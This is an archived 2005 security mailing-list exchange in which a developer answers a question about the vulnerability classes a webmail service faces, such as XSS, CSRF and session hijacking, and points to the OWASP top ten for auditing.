WebApp Sec mailing list archives
RE: Webmail Service vulnerabilities
From: "Scovetta, Michael V" <Michael.Scovetta () ca com>
Date: Tue, 4 Jan 2005 16:29:45 -0500
Dimo, A webmail service is just a web application, and could be vulnerable to anything that a general application could be (injection, hijacking, bad crypto, etc). Take a look at the OWASP "top ten" (owasp.org) and go from there. In particular, if the webmail service exposes additional points of contact (web services, pop, etc), then you need to pen-test those points too. Specific to a webmail application, you need to be particularly careful about XSS and broken authentication, as those would likely be the first to be attacked. Michael Scovetta Computer Associates Senior Application Developer -----Original Message----- From: Dimitri Borjac [mailto:dimooo () gmail com] Sent: Tuesday, January 04, 2005 8:27 AM To: webappsec () securityfocus com Subject: Webmail Service vulnerabilities Hi folks! I'm trying to list the different vulnerabilities a classical Webmail service could present. I didn't find any specific documentation regarding this particular type of service, but some flaws common to multiple webapps could theoretically affect it. Among them I have listed so far : XSS and XST (script and form injection), CSRF, session hijacking (based on cookies, session ids, ...), any kind of parameter manipulation. Has any of you already performed an audit of such a service ? Or based on your experience over webapps security, do you see any other vuln this service could present? Thanks a lot for your suggestions or recommandations ! -dimo
Current thread:
- Webmail Service vulnerabilities Dimitri Borjac (Jan 04)
- Re: Webmail Service vulnerabilities Moritz Naumann (Jan 06)
- Re: Webmail Service vulnerabilities Tim Brown (Jan 06)
- <Possible follow-ups>
- RE: Webmail Service vulnerabilities Scovetta, Michael V (Jan 06)